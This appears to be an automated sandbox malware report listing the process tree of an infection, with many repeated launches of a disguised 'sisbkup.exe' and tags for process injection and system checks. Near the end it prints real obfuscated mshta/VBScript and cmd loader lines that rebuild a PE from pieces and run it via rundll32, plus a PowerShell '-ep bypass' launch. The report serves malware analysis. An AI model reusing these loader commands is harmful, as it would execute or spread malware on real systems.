C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\iuehjsa (depth 2)
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsa (depth 3)
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\jjehjsa (depth 2)
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe (depth 2)
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe (depth 2)
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe (depth 2)
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe (depth 2)
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe (depth 2)
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe (depth 2)
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe (depth 2)
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe (depth 2)
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe (depth 2)
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe (depth 2)
-
C:\Users\Admin\AppData\Roaming\jjehjsa (depth 2)
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsa (depth 2)
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsa (depth 3)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe (depth 2)
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe (depth 2)
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe (depth 2)
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe (depth 2)
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe (depth 2)
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe (depth 2)
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe (depth 2)
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe (depth 2)
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe (depth 2)
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe (depth 2)
-
C:\Users\Admin\AppData\Roaming\jjehjsa (depth 2)
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsa (depth 2)
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsa (depth 3)
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe (depth 2)
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe (depth 2)
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe (depth 2)
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe (depth 2)
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Local\Temp\F457.exe (depth 1)
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe (depth 2)
  cmdline: "C:\Windows\System32\mshta.exe" vBSCrIpT: clOse( CreatEoBJECT ( "wsCrIpT.SheLl").RUn ("C:\Windows\system32\cmd.exe /C tYPE ""C:\Users\Admin\AppData\Local\Temp\F457.exe"" > nDRwKPXQhM.EXe &&STARt nDRWKpXQhM.ExE /p7DthEYNU7NMLXbDwjExstCKI1T & If """" == """" for %Y IN ( ""C:\Users\Admin\AppData\Local\Temp\F457.exe"" ) do taskkill -Im ""%~NxY"" /f ", 0 , TrUe ) )
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
  cmdline: "C:\Windows\system32\cmd.exe" /C tYPE "C:\Users\Admin\AppData\Local\Temp\F457.exe" > nDRwKPXQhM.EXe &&STARt nDRWKpXQhM.ExE /p7DthEYNU7NMLXbDwjExstCKI1T &If ""== "" for %Y IN ( "C:\Users\Admin\AppData\Local\Temp\F457.exe" ) do taskkill -Im "%~NxY" /f
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\nDRwKPXQhM.EXe (depth 4)
  cmdline: nDRWKpXQhM.ExE /p7DthEYNU7NMLXbDwjExstCKI1T
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe (depth 5)
  cmdline: "C:\Windows\System32\mshta.exe" vBSCrIpT: clOse( CreatEoBJECT ( "wsCrIpT.SheLl").RUn ("C:\Windows\system32\cmd.exe /C tYPE ""C:\Users\Admin\AppData\Local\Temp\nDRwKPXQhM.EXe"" > nDRwKPXQhM.EXe &&STARt nDRWKpXQhM.ExE /p7DthEYNU7NMLXbDwjExstCKI1T & If ""/p7DthEYNU7NMLXbDwjExstCKI1T "" == """" for %Y IN ( ""C:\Users\Admin\AppData\Local\Temp\nDRwKPXQhM.EXe"" ) do taskkill -Im ""%~NxY"" /f ", 0 , TrUe ) )
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\cmd.exe (depth 6)
  cmdline: "C:\Windows\system32\cmd.exe" /C tYPE "C:\Users\Admin\AppData\Local\Temp\nDRwKPXQhM.EXe" > nDRwKPXQhM.EXe &&STARt nDRWKpXQhM.ExE /p7DthEYNU7NMLXbDwjExstCKI1T &If "/p7DthEYNU7NMLXbDwjExstCKI1T "== "" for %Y IN ( "C:\Users\Admin\AppData\Local\Temp\nDRwKPXQhM.EXe" ) do taskkill -Im "%~NxY" /f
-
C:\Windows\SysWOW64\mshta.exe (depth 5)
  cmdline: "C:\Windows\System32\mshta.exe" VbSCRIPt: clOse ( CrEateOBJeCT ( "wscriPT.shElL" ).RuN( "cMd /Q /c ECho | sEt /p = ""MZ"" > ~IPT1qBT.OO0 &cOpy /b /Y ~iPT1QBT.OO0+ FYXY.~BG + AePh.D16 08paVA.D& staRT control.exe .\08pAVA.D & DEl FYXY.~Bg aEPh.D16 ~ipT1qBT.oO0 " , 0 ,tRuE ) )
-
C:\Windows\SysWOW64\cmd.exe (depth 6)
  cmdline: "C:\Windows\System32\cmd.exe" /Q /c ECho | sEt /p = "MZ" > ~IPT1qBT.OO0&cOpy /b /Y ~iPT1QBT.OO0+ FYXY.~BG + AePh.D16 08paVA.D&staRT control.exe .\08pAVA.D&DEl FYXY.~Bg aEPh.D16 ~ipT1qBT.oO0
-
C:\Windows\SysWOW64\cmd.exe (depth 7)
  cmdline: C:\Windows\system32\cmd.exe /S /D /c" ECho "
-
C:\Windows\SysWOW64\cmd.exe (depth 7)
  cmdline: C:\Windows\system32\cmd.exe /S /D /c" sEt /p = "MZ" 1>~IPT1qBT.OO0"
-
C:\Windows\SysWOW64\control.exe (depth 7)
  cmdline: control.exe .\08pAVA.D
-
C:\Windows\SysWOW64\rundll32.exe (depth 8)
  cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\08pAVA.D
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exe (depth 9)
  cmdline: C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\08pAVA.D
-
C:\Windows\SysWOW64\rundll32.exe (depth 10)
  cmdline: "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\08pAVA.D
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exe (depth 4)
  cmdline: taskkill -Im "F457.exe" /f
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\FABE.exe (depth 1)
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\366.exe (depth 1)
- Executes dropped EXE
- Modifies system certificate store
-
C:\Windows\SysWOW64\WerFault.exe (depth 2)
  cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1308 -s 892
- Loads dropped DLL
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\5CFC.exe (depth 1)
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\5CFC.exe (depth 2)
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3)
  cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noexit
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\B163.exe (depth 1)
- Suspicious behavior: GetForegroundWindowSpam
-
